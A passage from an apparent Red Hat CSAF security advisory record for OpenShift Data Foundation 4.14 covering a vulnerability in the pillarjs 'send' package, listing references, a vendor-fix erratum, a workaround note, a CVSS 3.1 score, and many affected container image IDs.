"https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2025-01-15T01:19:29+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:0323", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", 